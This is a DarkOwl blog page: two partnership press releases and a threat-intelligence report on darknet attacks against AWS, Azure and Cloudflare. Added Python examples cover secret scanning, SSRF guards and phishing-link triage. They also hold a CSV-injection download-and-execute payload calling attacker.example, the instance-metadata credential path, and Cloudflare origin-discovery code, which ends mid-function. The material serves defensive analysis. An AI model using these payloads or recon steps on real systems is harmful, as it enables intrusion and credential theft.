Author: DarkOwl Analyst Team

King & Union and DarkOwl Unite to Provide Fractional Access to Searchable Darknet Data

DarkOwl Brings World’s Largest Database of Darknet Content to King & Union Avalon Cyber Analysis Platform Customers

Denver, CO – WEBWIRE – Thursday, June 25, 2020 – DarkOwl LLC, the Denver-based darknet big data cybersecurity company, and King & Union, creator of the Avalon Cyber Analysis Platform, today announced a strategic partnership. DarkOwl will provide King & Union Avalon clients with access to DarkOwl Vision API, the world’s largest database of darknet content.

The partnership pairs DarkOwl’s extensive darknet data with King & Union Avalon’s enrichment user interface and easy visualization of data sets, enabling swift, accurate, and efficient company exposure, fraud, and actor attribution research. Avalon enhances the DarkOwl experience by streamlining queries into simple use case-based query calls and allows investigators to enrich the data using additional data sources, collaborate with others, draft context-specific reports, and tie finished data directly back into the security stack for immediate action.

Time is of the essence when trying to perform actor attribution. Investigators, including law enforcement and corporate intelligence analysts, can perform deep & dark web (DDW) research using DarkOwl Vision API and quickly unify, visualize, and enrich threat intelligence in a single workspace with Avalon to better understand data relationships.

Analysts are given the tools to find compromised sensitive data, conduct corporate exposure searches, and locate or identify threat actors through DarkOwl Vision data, reducing the time to post-breach response. Avalon’s ability to preserve and reference past investigations can also aid the identification of repeat actors as analysts build upon their existing library of knowledge.

“What King & Union has done is remarkable; they have centralized a wide range of data sources on one integrated platform which provides limited time and fractional data access to their clients who may need this data only for discrete periods of time,” said DarkOwl CEO, Mark Turnage.

“We are thrilled to embark on this unique partnership where we will integrate our DarkOwl data into their platform.”

“King & Union strives to provide security analysts with the high-quality threat intelligence, tools, and collaboration they need and bring them together in a single, integrated platform to help make their lives easier,” said John Cassidy, CEO and Co-Founder, King & Union. “Our integration with DarkOwl will enhance analysts’ access to darknet content, providing the depth of threat intelligence they need for accurate, thorough investigations.”

For more information, visit www.kingandunion.com or www.darkowl.com.

About King & Union
King & Union is a cybersecurity company based in Alexandria, Va., that has built and designed Avalon, the industry’s first cyber analysis platform. Avalon helps streamline threat investigations by providing the intelligence, tools, collaboration, and services security analysts need in a seamless, integrated workspace. Avalon provides security analysts with an accessible, consumable, and actionable platform for widespread use by all organizations, regardless of size, security capability, or maturity.

Visit King & Union at kingandunion.com, follow us on LinkedIn or Twitter, or email [email protected] for more information.

About DarkOwl
DarkOwl was founded in 2016 with the mission of collecting the broadest dataset of darknet content available in the cyber-defense industry and making that data both accessible and valuable to its clients. By empowering its customers to have eyes on the darknet, DarkOwl enables organizations to fully understand their security posture, detect potential breaches, mitigate them quickly, and investigate even the furthest and most obscure reaches of the internet.

###

Media Contacts
For DarkOwl:
Kim Ketchel
Director of Marketing, DarkOwl

For King & Union:
Jennifer Balinski
Account Manager, Guyer Group on behalf of King & Union
[email protected]

Arceo and DarkOwl Renew Engagement to bring Darknet Risk Scoring to Insurance Industry

DENVER–(BUSINESS WIRE)–DarkOwl LLC, a Denver-based cybersecurity company specializing in darknet data, is proud to announce that they are extending their cyber risk assessment work with Arceo.ai.

Arceo provides an end-to-end, turnkey platform that empowers the insurance ecosystem to efficiently transact cyber policies and understand their risk exposure across all markets.

DarkOwl’s DARKINT Scores supplement Arceo’s risk scoring to more accurately and efficiently measure cyber risk exposure on the darknet. Similar to a credit score, DARKINT Scores are based on relevant dark web data that can enable underwriters, re-insurers, brokers and the like to cast a wider net in the calculation of cyber risk.

DarkOwl CEO, Mark Turnage states, “Arceo.ai is a critical player in the cyber insurance industry, a best-in-breed, and we are proud to continue our partnership—which has been fruitful and very successful. There is much to be done regarding monitoring for cyber risk in the insurance industry, particularly in the darknet, and we make a powerful team with Arceo.”

“So much emphasis is put on checking the security posture on an enterprise, but a company’s exposure on the darknet is critical to understanding how well this posture has held up against criminal attackers. DarkOwl has been a great source of intelligence and highly flexible in integrating their product into a solution that can better serve our clients,” shares Dr. Ann Irvine, Head of Data Science at Arceo.

The Arceo platform provides all insurance stakeholders with a common framework powered by global cyber threat intelligence, state-of-the-art technical assessment, and advanced insurance analytics. Unlike static cyber risk scoring solutions, Arceo combines dynamic risk assessment with quoting and binding into one platform to streamline policy distribution and underwriting.

Going forward, Arceo and DarkOwl will be teaming up to conduct and provide research and insights into the effects of cyber risk exposure on the darknet.

For more information on Arceo, please visit www.arceo.ai. For more information on DarkOwl, please visit www.darkowl.com.

About Arceo.ai

Arceo.ai enables cyber resilience by combining smarter insurance products with dynamic security solutions. Headquartered in San Francisco, Arceo empowers insurers and brokers to better assess, underwrite, and manage cyber risks through a patented methodology called Cyber Meteorology. Arceo’s holistic risk analytics and insurance platform enables enterprises to better identify, respond to, and recover from cyber risks by using AI to drive advanced risk assessment and proactive security services. For more information, visit www.arceo.ai and stay up to date on our blog, Twitter and LinkedIn.

About DarkOwl

DarkOwl was founded in 2016 with the mission of collecting the broadest dataset of darknet content available in the cyber-defense industry and making that data both accessible and valuable to its clients. By empowering its customers to have eyes on the darknet, DarkOwl enables organizations to fully understand their security posture, detect potential breaches, mitigate them quickly, and investigate even the furthest and most obscure reaches of the internet.

Darknet Threats to Cloud-based Platforms and Applications

DarkOwl has investigated threats to cloud-based platforms and applications discussed on the darknet in order to identify threat actors that are specifically targeting cloud environments. Our investigation includes a broad range of cloud environments; from compromising personal iCloud accounts to hacking large-scale infrastructures such as Microsoft Azure and Amazon Web Services (AWS).

Attack Methodology

Understanding the attack vector against cloud-based platforms is the first step to understanding where to start the darknet research. Fortunately, there are many discussions across the information security community on technical approaches to penetrating a cloud-based network for malicious intention.

As with any information network, one of the simplest ways to gain access is through targeted social engineering and/or credential compromise. Social engineering AWS/Azure network users through the use of fabricated emails, calls or social media is a proven approach to obtaining user credentials. If a user has API keys for accessing the platform, general phishing techniques can be easily employed to gain access to the user’s computer and other accounts, where the attacker could then pull the API keys for said AWS user. One hacker emphasized the importance of learning as much as you can about a target organization in social engineering, highlighting that AWS is no exception. Threat actors target information such as AWS account ids, Amazon Resource Names (ARNs), IP addresses, Role Names, and other related AWS information in order to start an attack on the network [ref].

Some hackers have successfully sent SMS text messages to targeted network users. The SMS includes a malicious link that “appears to be a legitimate platform notification” for a password reset, and the authentication credentials the victim enters are captured. Amazon provides a number of user-friendly URLs for reaching the AWS console or the AWS SSO user portal. The following URL patterns can be imitated in targeted phishing, or, once the target’s account alias or ID is known, the threat actor can point credential brute forcing at the legitimate sign-in page:

IAM User Sign-In Link (name):    https://name.signin.aws.amazon.com/console

IAM User Sign-In Link (account id):    https://accountid.signin.aws.amazon.com/console

AWS SSO Start Page:      https://name.awsapps.com/start
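Because these patterns are what a lure imitates, a mail or proxy filter can triage links against them. The following Python is an added example (not DarkOwl’s code): it accepts only the documented sign-in hosts, a single label in front of `signin.aws.amazon.com`, `console.aws.amazon.com` or `awsapps.com`, and flags any other URL that still carries AWS sign-in branding as a lookalike. The sample email and the non-Amazon domains in it are constructed for the demo.

```python
"""Triage URLs from a suspected phishing email against AWS sign-in patterns.

Added example, not DarkOwl's code.  Legitimate forms are the ones listed
above (<alias-or-account-id>.signin.aws.amazon.com/console and
<name>.awsapps.com/start) plus the bare console hosts.  SAMPLE_EMAIL is
constructed; the non-Amazon domains in it are hypothetical.
"""
import re
from urllib.parse import urlsplit

# Exactly one DNS label in front of one of these suffixes is the documented shape.
LEGIT_SUFFIXES = (".signin.aws.amazon.com", ".console.aws.amazon.com", ".awsapps.com")
# Sign-in hosts that carry no account label.  Extend with your org's known hosts.
LEGIT_HOSTS = {"signin.aws.amazon.com", "console.aws.amazon.com", "aws.amazon.com"}
# Branding fragments a lookalike keeps so the victim recognises "AWS".
BRAND_TOKENS = ("signin.aws", "aws.amazon", "awsapps", "aws-signin",
                "signin-aws", "aws-console", "awsconsole")
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def classify_signin_url(url: str) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host:
        return "unrelated"
    if parts.scheme == "https":
        if host in LEGIT_HOSTS:
            return "legitimate"
        for suffix in LEGIT_SUFFIXES:
            if host.endswith(suffix):
                label = host[: -len(suffix)]
                # "acme.signin.aws.amazon.com" passes; the suffix check already
                # rejects "acme.signin.aws.amazon.com.evil.tld".
                if label and "." not in label:
                    return "legitimate"
    # Anything else that still carries AWS sign-in branding in the host or
    # path is a lookalike; this also catches an http:// downgrade of an
    # otherwise correct host.
    haystack = host + parts.path.lower()
    if any(token in haystack for token in BRAND_TOKENS):
        return "lookalike"
    return "unrelated"


def triage_message(body: str) -> dict:
    """Extract every URL from a message body and classify each one."""
    return {url: classify_signin_url(url) for url in URL_RE.findall(body)}


# Constructed lure: one genuine link buried among imitations.
SAMPLE_EMAIL = """\
Your AWS console password expires today. Sign in to keep access:
https://acme.signin.aws.amazon.com.account-verify.example/console
If that link does not work use http://acme.signin.aws.amazon.com/console
or https://aws-signin-console.example/acme/start
Reference documentation: https://acme.signin.aws.amazon.com/console
Unsubscribe: https://newsletter.example.org/unsub
"""

if __name__ == "__main__":
    for url, verdict in triage_message(SAMPLE_EMAIL).items():
        print(f"{verdict:11s} {url}")
```

The verdict for a legitimate-looking link is still only a hostname check; the account alias in front of the suffix should additionally be compared with the aliases and account IDs your organisation actually owns, since a lure can point at an attacker-owned AWS account with a convincing alias.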

Figure 1: Source, DarkOwl Vision DocID: 9d47d601acbbb5c3e8cedc4e3f574352

Other malicious threat actors, such as the hacker behind the RouteX Malware, have successfully accessed cloud accounts through the reuse of compromised account usernames and passwords and automated “credential-stuffing.”

Figure 2: Source, DarkOwl Vision DocID: 73b071f96795871a39411fc9fd4ee70b

Despite repeated warnings from the infosec community, it is well known that most people still continue to reuse passwords, jeopardizing the security of their cloud-based platform accounts. (Source: a136a0a1fb206b55f06084f100ab4cbc)

Methodology – API Keys

Some cloud services, like AWS, issue API keys that let technical users control cloud resources programmatically without a username and password; on AWS this is an access key ID paired with a secret access key, both random strings of letters and digits. API keys are an easy starting point for compromising an AWS account, and the darknet contains thousands of such mentions. The Telegram group MrChecker.net sells AWS keys for as little as 15 USD, while other hackers post stolen keys to darknet paste sites for future use. (Source: cbe876388ac06e2caddc6c69f516a310)

Figure 3: Source, Offer for AWS Keys for sale on Telegram Supergroup

Figure 4: Source, Listing of Secret AWS Keys on Deep Web, DarkOwl Vision DocID: fa60ca54163e81409ce6800964dadce2

Some developers have accidentally committed their AWS access keys to public code-hosting sites such as GitHub. According to open source reporting, threat actors run bots that persistently scan GitHub for unprotected AWS access keys.

One widely disclosed open-source tool is TruffleHog, a Python script that searches git history for high-entropy strings that look like secrets. In recent months, GitHub user Crypto-Breaker committed an entire repository called “My Arsenal of AWS Security Tools” that could easily be adapted to exploit AWS accounts and S3 buckets. Some AWS users have argued that Amazon now actively searches GitHub for committed secret keys, restricting the potentially compromised key and notifying the account owner automatically before a threat actor can run up a large AWS bill.
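What a TruffleHog-style scan actually does is small enough to show in full. The following Python is an added example, not DarkOwl’s code and not TruffleHog’s: it runs two detectors over a unified diff, a pattern match for AWS access key IDs and a Shannon-entropy test for the 40-character secret that usually sits next to one, and shows why a 40-character commit hash does not trip the entropy check. The diff is constructed for the demo and the key values in it are the AWS documentation examples, not live credentials.

```python
"""Scan a git diff for leaked AWS access keys (TruffleHog-style).

Added example; not DarkOwl's or TruffleHog's code.  Two detectors:
 - a pattern for AWS access key IDs (AKIA = long-term, ASIA = temporary,
   each followed by 16 upper-case letters or digits);
 - a Shannon-entropy test on 40-character base64-alphabet runs, which is
   how the original TruffleHog flagged secrets it had no pattern for.
SAMPLE_DIFF is constructed; its key values are the AWS documentation
examples (AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY), not real credentials.
"""
import math
import re
from collections import Counter

ACCESS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")
# Exactly 40 base64-alphabet characters that are not part of a longer run.
SECRET_RUN_RE = re.compile(
    r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")
ENTROPY_THRESHOLD = 4.5  # bits per character, TruffleHog's base64 cut-off


def shannon_entropy(s: str) -> float:
    """Bits per character: 0.0 for a constant string, at most
    log2(alphabet size) for a uniformly random one."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text: str, added_only: bool = True) -> list:
    """Return findings as dicts with line number, kind, value and entropy.

    With added_only=True only the '+' lines of a unified diff are examined
    (the '+++' file header is skipped), which is the pre-commit use case.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if added_only and (not line.startswith("+") or line.startswith("+++")):
            continue
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append({"line": lineno, "kind": "aws_access_key_id",
                             "value": m.group(0), "entropy": None})
        for m in SECRET_RUN_RE.finditer(line):
            run = m.group(0)
            ent = shannon_entropy(run)
            # A 40-hex-character commit hash tops out at 4.0 bits/char and
            # stays below the threshold; a real secret scores about 4.6+.
            if ent >= ENTROPY_THRESHOLD:
                findings.append({"line": lineno, "kind": "high_entropy_secret",
                                 "value": run, "entropy": round(ent, 2)})
    return findings


SAMPLE_DIFF = """\
diff --git a/config/settings.py b/config/settings.py
index 3f2a1b7..9c4d2e0 100644
--- a/config/settings.py
+++ b/config/settings.py
@@ -10,4 +10,7 @@ DEBUG = False
-AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
+AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+RELEASE_SHA = "da39a3ee5e6b4b0d3255bfef95601890afd80709"
+PLACEHOLDER = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_DIFF):
        # Never log the whole secret; a prefix is enough to locate it.
        print(f"line {f['line']}: {f['kind']} {f['value'][:6]}... entropy={f['entropy']}")
```

Run as a pre-commit hook this blocks the commit before the key ever reaches a public remote; if a key has already been pushed, treat it as compromised and rotate it, because the scanning bots described above typically find it within minutes and rewriting git history does not recall the copies they already made.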

Figure 5: Source, DarkOwl Vision DocID: 7730edcec2ea299da0103e9e344bdad3

Attack Methodology – Third Party Software and Web Applications

One security researcher discussed in detail the use of Server-Side Request Forgery (SSRF) for privilege escalation. In an SSRF, the attacker makes a vulnerable application issue requests on the attacker’s behalf, from the application server to destinations the attacker could not reach directly, such as internal services or the cloud provider’s instance metadata service. Where the URL handler accepts other schemes, swapping http(s):// for file:// can additionally read local files and yield session keys or other secrets from the server. The most valuable target on AWS is the instance metadata service (IMDS) at 169.254.169.254: a plain GET to the IAM security-credentials path returns the same temporary credentials that the application’s instance role uses. For example the URL:

[image not reproduced (cloud-threats-6.png): the example metadata-service URL, of the form http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>]

will return a JSON object that contains an AccessKeyId, a SecretAccessKey and a session Token, which gives whoever made that request the instance role’s access to the AWS environment until the credentials expire. IMDSv2, which requires a session token obtained with a PUT request before any metadata is served, defeats the simple GET-based form of this attack, so enforcing IMDSv2 on instances is the standard mitigation.

Coupling these techniques with boto3, the AWS SDK for Python, an attacker can then make further API calls with the stolen credentials, including overwriting the objects behind an S3-hosted website to deface it [source]. The Telegram channel exploithub discusses SSRF against Azure as well as other critical vulnerabilities in cloud-based platforms.

Figure 6 Example code Extracted from boto3
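The two halves of this attack path, turning the IMDS JSON into usable SDK credentials and stopping the SSRF that fetches it, are shown in the following Python. This is an added example, not code from the page or from the researcher it cites. `parse_imds_credentials` maps the IMDSv1 response onto the keyword arguments `boto3.Session()` accepts; `is_safe_fetch_target` is the destination check a server-side URL fetcher needs so that it refuses metadata, loopback and private addresses. The JSON document is constructed (its keys are the AWS documentation example values), `web-app-role` is a hypothetical role name, and `static_resolver` replaces DNS so the demo runs offline.

```python
"""Instance-metadata credential theft via SSRF, and the fetch guard against it.

Added example; not code from the page or from the researcher it cites.
SAMPLE_IMDS_JSON is constructed; its keys are the AWS documentation example
values, not live credentials.  "web-app-role" is a hypothetical role name.
"""
import ipaddress
import json
import socket
from urllib.parse import urlsplit

IMDS_BASE = "http://169.254.169.254"
IMDS_CREDS_PATH = "/latest/meta-data/iam/security-credentials/"

SAMPLE_IMDS_JSON = json.dumps({
    "Code": "Success",
    "LastUpdated": "2020-06-09T18:00:00Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
    "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "Token": "FwoGZXIvYXdzEBYaDExampleSessionTokenNotReal==",
    "Expiration": "2020-06-10T00:30:00Z",
})


def credentials_url(role_name: str) -> str:
    """The IMDSv1 URL an SSRF payload targets for a given instance role."""
    return IMDS_BASE + IMDS_CREDS_PATH + role_name


def parse_imds_credentials(body: str) -> dict:
    """Turn the IMDS JSON into boto3.Session(**kwargs) arguments."""
    doc = json.loads(body)
    if doc.get("Code") != "Success":
        raise ValueError("IMDS returned no credentials: %r" % doc.get("Code"))
    # IMDS hands out temporary (ASIA...) keys, so the session token is
    # mandatory: without it every API call fails with InvalidClientTokenId.
    return {
        "aws_access_key_id": doc["AccessKeyId"],
        "aws_secret_access_key": doc["SecretAccessKey"],
        "aws_session_token": doc["Token"],
    }


# Destinations a user-supplied URL must never reach from the server side.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",   # link-local: AWS, Azure and GCP metadata endpoints
    "127.0.0.0/8", "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10",
    "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fe80::/10", "fc00::/7",
)]


def static_resolver(mapping: dict):
    """getaddrinfo-shaped resolver over a fixed name->IP table (offline demo)."""
    def resolve(host, port):
        if host not in mapping:
            raise socket.gaierror("unknown host %s" % host)
        return [(None, None, None, None, (mapping[host], port or 0))]
    return resolve


def is_safe_fetch_target(url: str, resolver=socket.getaddrinfo) -> bool:
    """True only if the scheme is http(s) and every address the host resolves
    to is public.  Production code must also re-check every redirect hop and
    connect to the address it checked, or DNS rebinding bypasses this."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False  # file://, gopher:// etc. are rejected outright
    host = parts.hostname
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:  # a name rather than a literal: resolve it
        try:
            addrs = [ipaddress.ip_address(info[4][0]) for info in resolver(host, None)]
        except (OSError, ValueError):
            return False  # unresolvable: fail closed
    for addr in addrs:
        # ::ffff:169.254.169.254 is the metadata address written as IPv6.
        if addr.version == 6 and addr.ipv4_mapped is not None:
            addr = addr.ipv4_mapped
        if any(addr in net for net in BLOCKED_NETWORKS):
            return False
    return True


if __name__ == "__main__":
    url = credentials_url("web-app-role")
    print(url, "blocked" if not is_safe_fetch_target(url) else "allowed")
    print(parse_imds_credentials(SAMPLE_IMDS_JSON)["aws_access_key_id"])
```

The guard is the application-level defence; the platform-level one is IMDSv2, where a client first has to PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header and then present the returned token on every GET. An SSRF that can only influence a GET URL cannot complete that exchange, which is why enforcing IMDSv2 (and a hop limit of 1 so containers cannot relay it) closes the path described above even when the application bug remains.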

Attack Methodology – Malicious Injection

AWS and Azure have both been shown to be vulnerable to CSV injection. An attacker-controlled string (a resource name, a tag) ends up in a CSV export that an administrator opens in Excel, where a cell beginning with = is evaluated as a formula, so the target is the administrator’s workstation rather than the cloud server itself. Ready-Hacker-One includes cross-site request forgery (CSRF) and CSV injection payloads in their “Everythingpayloads” GitHub repository (Source: f78043b645a4e1ce2c66e3aaf4783748), while Rhino Security Labs details the AWS and Azure variants in multiple open source reports. For example, the following command will download an executable from a remote server using PowerShell and then run it on the target user’s computer. In the words of the source report: “The external web server is served over HTTP and automatically redirects to my malicious .exe file, because due to Azure’s validation, forward and backward slashes break this vulnerability” [source].

[image not reproduced (Screen Shot 2020-06-09 at 10.44.13 PM.png): the PowerShell download-and-execute payload placed in a CSV cell]
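The payload shape, a detector for it, and the export-side fix fit in one short script. The following Python is an added example, not code from the page or from Rhino Security Labs’ reports. It writes a constructed resource list the way the vulnerable consoles did (verbatim), audits it for cells a spreadsheet would evaluate, and shows the OWASP-recommended neutralisation. `attacker.example` is a hypothetical host and the rows are constructed for the demo.

```python
"""CSV (formula) injection: the payload shape, a detector, and the export fix.

Added example; not code from the page or from Rhino Security Labs' reports.
Scenario: a cloud console lets an attacker set a string (resource name,
tag, display name) that an administrator later exports as CSV and opens in
Excel.  A cell that starts with = + - @ (or a tab / carriage return) is
parsed as a formula, and DDE syntax such as =cmd|' /C ...'!A0 launches a
command on the administrator's workstation.  SAMPLE_ROWS is constructed;
attacker.example is a hypothetical host.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(cell) -> bool:
    """True for text a spreadsheet would evaluate rather than display."""
    return isinstance(cell, str) and cell.startswith(FORMULA_TRIGGERS)


def audit_rows(rows) -> list:
    """Detection: (row, column, value) for every cell that would fire."""
    return [(r, c, cell) for r, row in enumerate(rows)
            for c, cell in enumerate(row) if is_formula_cell(cell)]


def neutralise_cell(cell):
    """Export-side fix (the OWASP recommendation): prefix a triggering cell
    with a single quote so the spreadsheet reads it as literal text.  The
    csv module's own quoting is not a defence: Excel strips the double
    quotes and still evaluates "=cmd|...".
    """
    return "'" + cell if is_formula_cell(cell) else cell


def export_vulnerable(rows) -> str:
    """Writes user-controlled strings verbatim, as the vulnerable consoles did."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(rows)
    return buf.getvalue()


def export_hardened(rows) -> str:
    """Same export with every triggering cell neutralised."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerows(
        [[neutralise_cell(cell) for cell in row] for row in rows])
    return buf.getvalue()


def parse_csv(text: str) -> list:
    """Read an export back the way a spreadsheet import would see the cells."""
    return list(csv.reader(io.StringIO(text)))


# Constructed export of a resource list; rows 2 and 3 carry attacker tags.
SAMPLE_ROWS = [
    ["resource", "owner", "tag"],
    ["vm-01", "alice", "prod"],
    ["vm-02", "bob",
     "=cmd|' /C powershell -c \"iwr http://attacker.example/x.exe -OutFile x.exe; .\\x.exe\"'!A0"],
    ["vm-03", "carol", "-2+3+cmd|' /C calc'!A0"],
]

if __name__ == "__main__":
    for r, c, value in audit_rows(SAMPLE_ROWS):
        print(f"row {r} col {c}: {value!r}")
    print(export_hardened(SAMPLE_ROWS))
```

The single-quote prefix also changes legitimate values that begin with a minus sign, so numeric columns should be written as numbers rather than strings (the function leaves non-string cells alone). The same `audit_rows` check is useful on the input side, at the point where a user sets a name or tag, so the payload never reaches an export at all.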

Figure 7: Source, DarkOwl Vision DocID: 40ce4e6a9e2e7ca1b5460bdca7fb9c82

Darknet forum user Everest_RR started a thread discussing how CSRF exploitation could yield credentials and a starting point for attacking servers through over 100 Jenkins plug-ins (Figure 7). The plug-in developers failed to require POST for form-handling endpoints, and Jenkins only enforces its CSRF token (the “crumb”) on POST requests, so the actions could be triggered via GET from any page the victim visited. These third-party plug-ins integrate with most popular cloud platforms and services, such as AWS, VMware, Azure and Twitter.

Azure Vulnerabilities on the Darknet

Hackers frequently discuss vulnerabilities in various platforms on the darknet. A recent Azure vulnerability, CVE-2019-1306, “Azure DevOps and Team Foundation Server Remote Code Execution Vulnerability”, was explicitly posted to a hacker forum on the darknet by the user known by the moniker PresidentXS. An attacker who successfully exploits this vulnerability can execute malicious code in the context of the Azure DevOps (ADO) service account.

Figure 8: Source, DarkOwl Vision DocID: 2f579f9a1711a11e065983edc3641293

Earlier this year, Russian hackers on the darknet forum Dublikat discussed Azure Stack vulnerabilities documented in CVE-2019-1234 (Source: d25c98cc06300c5a8e3dcbd1a6ebf606). Such discussion threads in DarkOwl Vision are useful for reviewing comments, exploring applications, and use cases for the vulnerability specifically.

Figure 9: Source, Captured from darknet forum: https://dublik2uqiorycsj[.]onion/threads/ujazvimosti-v-microsoft-azure-pozvoljali-zaxvatyvat-chuzhie-servery.155202

In 2018, a user on a popular darknet security forum, Torum, expressed interest in attacking an online web server located on the Azure platform. The purpose of the forum thread was less to discuss the attack vector, but more for the solicitation of assistance in the venture. The user, badass888, listed a number of “illegal sports betting” software websites that they wanted to replicate, but the threat actor needed to hack Azure’s cloud platform to gain access to the website databases and source code. It is unclear from the comments whether the hacker managed to find help, but malicious intent is present.

Figure 10: Source, DarkOwl Vision DocID: 5bc5355f20e410d114720b273b1cca0

Google Cloud

Google’s cloud storage service, Google Drive, is also regularly abused by threat actors on the darknet. One Russian forum user, “KeyBox,” recently offered an “unlimited” Google Drive account for a one-off fee that undercuts Google’s monthly storage plans. The service is advertised on keybox.pp.ua, with further discounts on offer.

Это супер выгодно – по подписке 1000 Gb дискового пространства стоит около 1000 руб в месяц, а здесь вы платите один раз и получаете Безлимитный Google Drive.

Translation: This is a great deal – on a subscription, 1000 GB of disk space costs about 1000 rubles a month, but here you pay once and get unlimited Google Drive.

Figure 11: Source, DarkOwl Vision DocID: 61cf92e1a44cb234e5966549eda52350

CloudFlare

Another popular topic on the darknet is how to bypass Cloudflare, the content delivery network and reverse proxy that hides a website’s origin server.

Figure 12: Source, DarkOwl Vision DocID: 56155bc8726d266a810b9fab514cfea6

Cloudflare acts as an intermediary between a client and a server: it terminates the client’s connection at its own edge, filters and caches requests, and forwards legitimate traffic to the origin, so the origin’s real IP address is never exposed to the client. Its filtering exists to identify malicious traffic and keep attackers from reaching the origin server directly, which is exactly why attackers want to discover the origin.

According to one darknet user, “CloudFlare is a big pain to us hackers.” Torigon user xData_ recently posted an informative thread on multiple Cloudflare bypass methods. The thread details tools for different platforms as well as host discovery methods, including searching TLS certificate data and finding subdomains that point back to the origin’s IP.

Figure 12: Source, DarkOwl Vision DocID: 56155bc8726d266a810b9fab514cfea6

There are numerous tools readily available for bypassing Cloudflare protections. Most of the software is hosted on GitHub and relies on public APIs. The Censys API is regularly referenced by threat actors to expose a target’s origin IP address through TLS certificate data: hosts presenting the same certificate as the Cloudflare-fronted site are candidate origins. Once a list of potential origin servers (IPv4 hosts) has been obtained, some scripts request the site from each one directly and compute the similarity of the response with the response served through the original domain, using a structural similarity function designed for comparing websites, in the spirit of a Levenshtein distance calculation.

Another extremely popular resource, regularly referenced for Cloudflare bypass, is “CloudFail” created by the hacker m0rtem. CloudFail is described as a “tactical reconnaissance tool” for target data collection. The script can route all requests through Tor, checks for misconfigured DNS using DNSDumpster.com, queries the crimeflare.com database, and finally brute-forces a wordlist of roughly 2,500 subdomains.

Figure 13: Source, Screen capture of Cloudfail.py (Source: github.com)

The subdomain discovery methods discussed in xData_’s thread are in full use, as captured by multiple DarkOwl Vision results. There are several hundred examples like the figures below in which each subdomain’s IP has been identified along with a Cloudflare protection flag (on or off). Another threat actor did a similar subdomain analysis of the social media platform Snapchat in late 2019 (Source: 42995a33628e79b929ee7708999f0ebc). Most results in the format <<Subdomain IP Cloudflare>> do not list an author; however, in November 2019, PostNL’s subdomains were enumerated by a user with the moniker ProxyManiac. This threat actor also identified some 300+ websites hosted on bulletproof hosting in another deep web data dump. (Source: 813aacb2d453e10ed8d0c2a2c9e63426)
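The two techniques described in the preceding paragraphs, the subdomain-versus-Cloudflare table seen in these dumps and the response-similarity ranking of candidate origins, are reproduced in the following Python. This is an added example, not code from the page, from CloudFail or from xData_’s thread. It tests each resolved subdomain against a snapshot of Cloudflare’s published IPv4 ranges (refresh the list from https://www.cloudflare.com/ips-v4 before relying on it), then scores the directly reachable hosts by how closely the page they serve for the target’s Host header matches the page served through Cloudflare, with `difflib`’s ratio standing in for the purpose-built structural similarity function. The DNS answers and HTML bodies are constructed so the script runs offline; the 203.0.113.0/24 and 198.51.100.0/24 addresses are documentation ranges.

```python
"""Subdomain Cloudflare check and origin-candidate ranking.

Added example; not code from the page, from CloudFail or from xData_'s
thread.  SAMPLE_DNS and the HTML bodies are constructed; the addresses in
203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
"""
import difflib
import ipaddress

# Snapshot of https://www.cloudflare.com/ips-v4; refresh before real use.
CLOUDFLARE_IPV4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]


def behind_cloudflare(ip: str) -> bool:
    """True if the A record points at a Cloudflare edge rather than a real host."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_IPV4)


def classify_subdomains(records: dict) -> list:
    """records maps subdomain -> A record.  Returns (subdomain, ip, flag) rows,
    flag 'on' if proxied by Cloudflare, 'off' if the host answers directly.
    The 'off' rows are the leak that gives the origin network away."""
    return [(host, ip, "on" if behind_cloudflare(ip) else "off")
            for host, ip in sorted(records.items())]


def exposed_hosts(records: dict) -> list:
    """Subdomains that bypass Cloudflare: what a defender should have none of."""
    return [host for host, ip, flag in classify_subdomains(records) if flag == "off"]


def similarity(a: str, b: str) -> float:
    """0..1 similarity of two response bodies (longest-matching-blocks ratio)."""
    return difflib.SequenceMatcher(None, a, b).ratio()


def rank_origin_candidates(reference_body: str, candidate_bodies: dict,
                           threshold: float = 0.8) -> list:
    """candidate_bodies maps candidate IP -> body fetched from that IP with the
    target's Host header.  Returns [(ip, score)] at or above threshold, best
    first; 1.0 means the host served exactly the page Cloudflare fronts."""
    scored = [(round(similarity(reference_body, body), 3), ip)
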